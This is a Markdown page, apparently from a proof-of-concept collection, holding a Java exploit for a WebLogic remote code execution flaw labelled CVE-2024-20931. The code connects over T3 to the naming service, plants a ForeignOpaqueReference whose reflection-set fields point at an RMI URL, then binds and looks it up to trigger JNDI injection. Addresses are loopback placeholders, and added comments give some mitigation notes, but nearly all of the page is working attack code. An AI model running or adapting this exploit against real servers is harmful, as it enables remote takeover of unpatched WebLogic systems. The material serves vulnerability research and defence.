POC00/Weblogic远程代码执行(CVE-2024-20931).md


WebLogic 远程代码执行(CVE-2024-20931)

PoC(概念验证代码;示例中的地址均为本机回环地址 127.0.0.1)

package com.supeream;

import weblogic.deployment.jms.ForeignOpaqueReference;

import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.Field;
import java.util.Hashtable;

/**
 * Proof-of-concept client for the WebLogic issue this page labels CVE-2024-20931.
 *
 * <p>Sequence performed by {@link #main(String[])}:
 * <ol>
 *   <li>open a JNDI context on a WebLogic naming service over T3;</li>
 *   <li>build a {@code ForeignOpaqueReference} whose private {@code jndiEnvironment} and
 *       {@code remoteJNDIName} fields are filled in by reflection;</li>
 *   <li>{@code rebind} that object under a fixed name, then {@code lookup} the same name.</li>
 * </ol>
 *
 * <p>Every address in the listing is a loopback value (127.0.0.1).
 *
 * <p>NOTE(review): the class name reads "209321" while the page title says CVE-2024-20931;
 * this looks like a typo in the identifier, which is kept as published.
 *
 * <p>Reviewer notes for defenders (inferred, not shown by this code; confirm against the
 * vendor advisory): the client environment below contains no credentials, so the exposure is
 * a T3 listener reachable by untrusted clients. Restricting T3/IIOP to trusted networks and
 * applying the vendor patch for this CVE are the relevant mitigations. Outbound JNDI (RMI/LDAP)
 * connections initiated by the WebLogic JVM are a useful detection signal.
 */
public class CVE_2024_209321 {
    public static void main(String[] args) throws Exception {
        // Step 1: client-side JNDI context pointing at the WebLogic naming service.
        // Only the factory and the provider URL are set; no principal or credentials.
        final String providerUrl = "t3://127.0.0.1:7001"; // target host (loopback in this listing)
        final String contextFactory = "weblogic.jndi.WLInitialContextFactory";
        Hashtable<String, String> clientEnv = new Hashtable<>();
        clientEnv.put(Context.PROVIDER_URL, providerUrl);
        clientEnv.put(Context.INITIAL_CONTEXT_FACTORY, contextFactory);
        InitialContext namingContext = new InitialContext(clientEnv);

        // Step 2: the environment that will travel inside the ForeignOpaqueReference.
        // It names oracle.jms.AQjmsInitialContextFactory as the initial context factory and
        // carries a "datasource" entry holding an RMI URL.
        // NOTE(review): presumably the server resolves "datasource" through JNDI when it
        // initialises that factory; that server-side step is not visible here, so confirm.
        final String rmiLocation = "rmi://127.0.0.1:1099/ygevmj";
        Hashtable<String, String> embeddedEnv = new Hashtable<>();
        embeddedEnv.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
        embeddedEnv.put("datasource", rmiLocation);

        // Step 3: populate the two private fields by reflection. The same RMI URL is used
        // for remoteJNDIName as for the "datasource" entry above.
        ForeignOpaqueReference reference = new ForeignOpaqueReference();
        assignHiddenField(reference, "jndiEnvironment", embeddedEnv);
        assignHiddenField(reference, "remoteJNDIName", rmiLocation);

        // Step 4: bind the object remotely under a fixed name.
        final String bindingName = "glassy";
        namingContext.rebind(bindingName, reference);

        // Step 5: look the name up again. The returned object is not used.
        try {
            namingContext.lookup(bindingName);
        } catch (Exception ignored) {
            // Deliberately ignored, as in the published listing: the result of the lookup
            // is never read, so a failure here does not change what the program does next.
        }
    }

    /**
     * Writes {@code value} into the private field {@code fieldName} declared on
     * {@code ForeignOpaqueReference}, making the field accessible first.
     *
     * @param target the instance whose field is written
     * @param fieldName the declared field name
     * @param value the value to store
     * @throws ReflectiveOperationException if the field does not exist or cannot be written
     */
    private static void assignHiddenField(ForeignOpaqueReference target, String fieldName, Object value)
            throws ReflectiveOperationException {
        Field hidden = ForeignOpaqueReference.class.getDeclaredField(fieldName);
        hidden.setAccessible(true);
        hidden.set(target, value);
    }
}

漏洞来源